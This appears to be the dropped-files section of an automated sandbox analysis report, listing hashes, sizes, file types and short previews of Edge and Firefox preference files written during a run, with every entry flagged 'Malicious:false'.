                                                                                                                                                                                                                                                                                                  SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):106496
                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.136413900497188
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cV/04:MnlyfnGtxnfVuSVumEHV84
                                                                                                                                                                                                                                                                                                  MD5:429F49156428FD53EB06FC82088FD324
                                                                                                                                                                                                                                                                                                  SHA1:560E48154B4611838CD4E9DF4C14D0F9840F06AF
                                                                                                                                                                                                                                                                                                  SHA-256:9899B501723B97F6943D8FE6ABF06F7FE013B10A17F566BF8EFBF8DCB5C8BFAF
                                                                                                                                                                                                                                                                                                  SHA-512:1D76E844749C4B9566B542ACC49ED07FA844E2AD918393D56C011D430A3676FA5B15B311385F5DA9DD24443ABF06277908618A75664E878F369F68BEBE4CE52F
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Users\user\AppData\Local\Temp\139308\Procedures.com
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1743), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9504
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.512408163813622
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:nnPOeRnWYbBp6RJ0aX+H6SEXKxkHWNBw8D4Sl:PeegJUaJHEw90
                                                                                                                                                                                                                                                                                                  MD5:1191AEB8EAFD5B2D5C29DF9B62C45278
                                                                                                                                                                                                                                                                                                  SHA1:584A8B78810AEE6008839EF3F1AC21FD5435B990
                                                                                                                                                                                                                                                                                                  SHA-256:0BF10710C381F5FCF42F9006D252E6CAFD2F18840865804EA93DAA06658F409A
                                                                                                                                                                                                                                                                                                  SHA-512:86FF4292BF8B6433703E4E650B6A4BF12BC203EF4BBBB2BC0EEEA8A3E6CC1967ABF486EEDCE80704D1023C15487CC34B6B319421D73E033D950DBB1724ABADD5
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44137
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.090771906784153
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkBMFwuF9hDO6vP6O+Mtbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEt6Ftbz8hu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:8662E3B695594A271DF7E422F06CFFCD
                                                                                                                                                                                                                                                                                                  SHA1:9645442E464804A59743EB3146CD4FD9EDF47B46
                                                                                                                                                                                                                                                                                                  SHA-256:7738F0D38EEFBAB681858E003DB09B3283FE791F75F95C444C62AD1B2B26BB7F
                                                                                                                                                                                                                                                                                                  SHA-512:34CF2DF69B58F51C939FC2F22CCD141AE460147DE97D02AA4AE06D4BC6F528CA1A4D2A042A8AD61628A6B959B6E5EFE73CA658239F450657691EA478DDF8F369
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):44600
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096219577018695
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB4wuzhDO6vP6O7xp+fu2lCFTkJv8UDPccGoup1XlI:z/Ps+wsI7ynEf6befGchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:60A20E62DA052BE31ECFCCE48FBD9FC6
                                                                                                                                                                                                                                                                                                  SHA1:1D911DD76A2D6A7DC3C892AE497F944518AA5006
                                                                                                                                                                                                                                                                                                  SHA-256:8AEB2A87780DA87EBC39CDC261F20F867485B722984FE643B2FB3A081CFD1EFF
                                                                                                                                                                                                                                                                                                  SHA-512:1E1471584DC9880071AF4DF8D30DCFEF73536DBEF1B29D479D44B3AE97C655BCD93716921B0D77BC0265E1D7892588325FA500CBF65EEE94000E3F0D4199DB9D
                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):44608
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.09607807003545
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB4wuzhDO6vP6O7xp+fup3uAgLTF+E+LcGoup1Xl34:z/Ps+wsI7ynEf6bef4Lchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:0FB48A133A7989DF8A53E41475C3E056
                                                                                                                                                                                                                                                                                                  SHA1:9F4CF950FB9A3F3E401269370DA8F8E52129CB61
                                                                                                                                                                                                                                                                                                  SHA-256:22EEC30A2C6FB9F52430446F17D70EA4A93DAC8363E49BFD035E320A378CE0C3
                                                                                                                                                                                                                                                                                                  SHA-512:32116B1DB0778A89807804BBA99F676767816336FD67F32343CCFBA1A17E822B0651CC7351CBA6CAEE7574AC6CC8CB07E0C00BA0B8BDB706AC0DE4B8048C5559
                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:modified
                                                                                                                                                                                                                                                                                                  Size (bytes):44616
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.096143633957459
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB4wuzhDO6vP6O7xp+fGDlNkExDcGoup1Xl3jVzXr2:z/Ps+wsI7ynEf6befochu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:3CDF8A9BE299BDDAB55B679E9498D364
                                                                                                                                                                                                                                                                                                  SHA1:B6880DEAB1D667F5FBE730ABDAB52F7DCD5E442D
                                                                                                                                                                                                                                                                                                  SHA-256:F5988E36B9040F2490598CF4674C2DF8F4092155713D4D6D1AFD5FCB51E139C2
                                                                                                                                                                                                                                                                                                  SHA-512:7E2AC40766A11B2B0A3846C9E977A199DC960400EAE3A744BA5DA4CBD610F51436FD14B9ADD7A8D5A6EEDD67DE6C3A41E35E8A261F0C74D11D84792699950278
                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44608
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.09607807003545
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4kkB4wuzhDO6vP6O7xp+fup3uAgLTF+E+LcGoup1Xl34:z/Ps+wsI7ynEf6bef4Lchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:0FB48A133A7989DF8A53E41475C3E056
                                                                                                                                                                                                                                                                                                  SHA1:9F4CF950FB9A3F3E401269370DA8F8E52129CB61
                                                                                                                                                                                                                                                                                                  SHA-256:22EEC30A2C6FB9F52430446F17D70EA4A93DAC8363E49BFD035E320A378CE0C3
                                                                                                                                                                                                                                                                                                  SHA-512:32116B1DB0778A89807804BBA99F676767816336FD67F32343CCFBA1A17E822B0651CC7351CBA6CAEE7574AC6CC8CB07E0C00BA0B8BDB706AC0DE4B8048C5559
                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):45796
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.088237849050337
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:mMkbJrT8IeQc5d9R5oouAhDO6vP6O7xp+fiP3uFEFhGycfCAomGoup1Xl3jVzXrR:mMk1rT8H19R5o6befLFRomhu3VlXr4i
                                                                                                                                                                                                                                                                                                  MD5:A34A1142714AF772ECEA80F7F0CB1953
                                                                                                                                                                                                                                                                                                  SHA1:68125BDED91C77D1F6670928F77D02E98CE03AE4
                                                                                                                                                                                                                                                                                                  SHA-256:C5F748FF84148F7B76F5B9C3304AD8CEB0B26B320B7A360E076B0F0EC846A3F6
                                                                                                                                                                                                                                                                                                  SHA-512:AADF6CD509A0B7E650D11D22FBB9E7F22CAC05069D7B37658365151CFED02A897277DDCA6DC9B3D3D6BA0F149E5F406AC34B0F5CDC37F25B7BCD5D0008EC0FBB
                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:{"abusive_adblocker_etag":"\"5E25271B8190D943537AD3FDB50874FC133E8B4A00380E2A6A888D63386F728B\"","browser":{"browser_build_version":"117.0.2045.47","browser_version_of_last_seen_whats_new":"117.0.2045.47","last_seen_whats_new_page_version":"117.0.2045.47"},"desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):44682
                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.095738129899133
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:768:zDXzgWPsj/qlGJqIY8GB4xkB6wuzhDO6vP6O7xp+fiP3uFEFhGcGoup1Xl3jVzXq:z/Ps+wsI7yOEV6befLchu3VlXr4CRo1
                                                                                                                                                                                                                                                                                                  MD5:AB247005E807CB5B4AF851EC870729C4
                                                                                                                                                                                                                                                                                                  SHA1:9C97E63805B9B516E83B02B3FA48E56223B25F0E
                                                                                                                                                                                                                                                                                                  SHA-256:B265B8CD24589BC8E10467BBD29A49A02D46B499F4596A0EF8DA07BDA4D01C42
                                                                                                                                                                                                                                                                                                  SHA-512:4C4B1641A93B6363BCE893F477623834429F7F03E9324C53FD723883843B14D30E373F0F21E47F4D1E2BA0AEE1DE4FA3FB80525558086563A3803D447B82CF97
                                                                                                                                                                                                                                                                                                  Malicious:false
Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.640159935562401
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                                                                                                                                                  MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                                                                                                                                                  SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                                                                                                                                                  SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                                                                                                                                                  SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):107893
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.640159935562401
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:B/lv4EsQMNeQ9s5VwB34PsiaR+tjvYArQdW+Iuh57P7p:fwUQC5VwBIiElEd2K57P7p
                                                                                                                                                                                                                                                                                                  MD5:D50EDBCB24807CB644253C4476148A1B
                                                                                                                                                                                                                                                                                                  SHA1:CBA3D7B6C0134871E694EDEDD4430947482F654B
                                                                                                                                                                                                                                                                                                  SHA-256:F75AF9BFFA927D76B4E0FB3C973C20D43CBFCA892BFA38F25AC03E89F4B35F68
                                                                                                                                                                                                                                                                                                  SHA-512:B9E401E8831BEF324C55897C404C009CA6CF602366226322330454B03912660591458ED03EB9C59D5C7F56C406239E6195F2382A65DE1E28B334E49E9CEF12F2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.04455415180585823
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:UxL0pqtm0nOAWVqYCKJgA8x5XSggykfhbNNETMIB/0TQsZoRaen8y08Tcm2RGOdB:KL0ctvMaKgk9hZ6Wton08T2RGOD
                                                                                                                                                                                                                                                                                                  MD5:70D20094F559192B0A26FEBB01B7B077
                                                                                                                                                                                                                                                                                                  SHA1:01C0763D5A25F2153106A06DA218DEDB38012252
                                                                                                                                                                                                                                                                                                  SHA-256:EFA759B2BB74D30F6DF605D813438A0BE6EEF43C8522B5B838D035673B864679
                                                                                                                                                                                                                                                                                                  SHA-512:CABFCAD97464415E02F1CEA8B57453E66BD458858C29A83EFAA136A7EAF7F74BFFF2B6661B5BA19E39DC9672D2D068D49E72C24A95599BD8AEDC44058D3833C2
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.43115544552009233
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3072:NrgrhkrSLQeq2oSy6xWG+aLvdF5rb8eto9S9FqoV6cNlg1HF:6rOLeqriWG+aL5to9S9FqoV6cNlaH
                                                                                                                                                                                                                                                                                                  MD5:8F48CA82D4CCAC7C7234768750921380
                                                                                                                                                                                                                                                                                                  SHA1:5478B29E5B8F808AA74DD0002962957ACDF007D6
                                                                                                                                                                                                                                                                                                  SHA-256:25FE646D46F025D651A1ED74C5D7B12D49FFDAB25DA28CBFD226340526A18C01
                                                                                                                                                                                                                                                                                                  SHA-512:596F5EAF71FAFCA3C29BC37B9BCAF102C2FD62496B92F2BF4E08B3D2293B3411E60B769F115E6BDE653F3CE3B117190958B1F8AC38C8F194AB5D26C09C8320F4
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):4194304
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.04486118184027462
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:ppNCZ0pqtm0nOAWVqYFJgA8x5XSggykHzhuB0NEVIV/ERQcQGwKcn8y08Tcm2RGY:oZ0ctvM9gk5h60vYTwP08T2RGOD
                                                                                                                                                                                                                                                                                                  MD5:E93B46EA4EBB7700E0CDF167AE21F4FA
                                                                                                                                                                                                                                                                                                  SHA1:F8BDA5E0B6F4702EDB9CBE9D4AD9430365E78286
                                                                                                                                                                                                                                                                                                  SHA-256:D672FC0C7528FEF9DAF4193C9AB573959D4B175D278C943D3E87C04BE4C5670A
                                                                                                                                                                                                                                                                                                  SHA-512:9220B5C527A2DAF78181DA04193E4428E38438194579F4EECA897A1C2E0EBDD2B910E9795628EE401662DD25853E1A87430767A04A4F3EE5F35FC3FB211BC9D0
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):280
                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.124898764628895
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:FiWWltlApdeXKeQwFMYLAfJrAazlYBVP/Sh/JzvPWVcRVEVg3WWD5etll:o1ApdeaEqYsMazlYBVsJDu2ziy5eX
                                                                                                                                                                                                                                                                                                  MD5:58C4D8DE72E3ECED51A6FA470EDB0B3F
                                                                                                                                                                                                                                                                                                  SHA1:EFBC52CA094310145103EB9A42AEDB37433E8C2D
                                                                                                                                                                                                                                                                                                  SHA-256:A0EA6C0BD7828E1691C2FB39D7B7CD642628E253684A809F814D9E25D8BE3F9F
                                                                                                                                                                                                                                                                                                  SHA-512:E92DEC4B52EA5786AADE4B675BAE5C8DDA0139064F82C71D37F5782D54894AA1BCAECBE9E4892D73D686724508857347BECD30D658267346B3DEBF1136C29A90
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):1
                                                                                                                                                                                                                                                                                                  Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:3:L:L
                                                                                                                                                                                                                                                                                                  MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                  SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                  SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                  SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:.
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:JSON data
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):9713
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.1123214215596
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:192:st3kdpos4hsZihUkrHCV8ibV+FauQA66WuaFIMYSPLYJ:st3Qos4hfhQbG7Qx6WuaTYf
                                                                                                                                                                                                                                                                                                  MD5:18D9B84D4BE5616664981543C13336ED
                                                                                                                                                                                                                                                                                                  SHA1:96B64104FEE8F812F2A3AC640BEC228AFB12F42E
                                                                                                                                                                                                                                                                                                  SHA-256:C239AD6488C9D29DA05DDFA40FBDE75C455D32D79FF18ED01694C7862F8C85EF
                                                                                                                                                                                                                                                                                                  SHA-512:48CA7B4286EFFFB9154BEA6AD3F022129FBF24C1F9384538DA3359613DF2BE8C088F068AEC0D52FBD9BFCF0E9E7E82073087AD05035FCBC35ABF79F672EAC151
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13379405060471109","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340900603634208","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"should_reset_check_default_browser":false,"toolbar_extensions_hub_button_visibility":0,"underside_chat_bing_signed_in_status":false,"window_placement":{"bottom":974,"left":10,"maximized":true,"right":1060,"top":10,"work_area_bottom":984,"work_area_left":0,"work_area_right":1280,"work_area_top":0}},"browser_content_container_height":882,"browser_content_container_width":1236,"browser_content_container_x":0,"browser_content_container_y":102,"continuous_migration":{"ci_correction_for_holdout_treatment_state":1},"countryid_at_install":17224,"custom_links":{"l
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):115717
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.183660917461099
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                                                                                                                                                  MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                                                                                                                                                  SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                                                                                                                                                  SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                                                                                                                                                  SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                  Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co
                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 text, with very long lines (17683), with no line terminators
                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                  Size (bytes):17684
                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.489705678064998
                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                  SSDEEP:384:st3PGKSu4os4hfh+7qpb3ywsbG7Qwp6WclaTYf:slOxuHhfkKWbGUiCaTYf
                                                                                                                                                                                                                                                                                                  MD5:3A59956DCF66B67CEA8D0B2F4EB17A42
                                                                                                                                                                                                                                                                                                  SHA1:023238F3551F997F6ED2696A13E996D85D3601E1
                                                                                                                                                                                                                                                                                                  SHA-256:A21F4F19ED1D6DB31D5FB5044E0A472FCEA43554CD9772AA59F14AB7D7871086
                                                                                                                                                                                                                                                                                                  SHA-512:2278DADB953B336B5703306DE4545EC3F3A9FD1FB90510B029879F4E2D10C09D3DCD533BA464164920D07E9824D2B3185500D59B17E1894C65C70BCBFC3F45C1
                                                                                                                                                                                                                                                                                                  Malicious:false
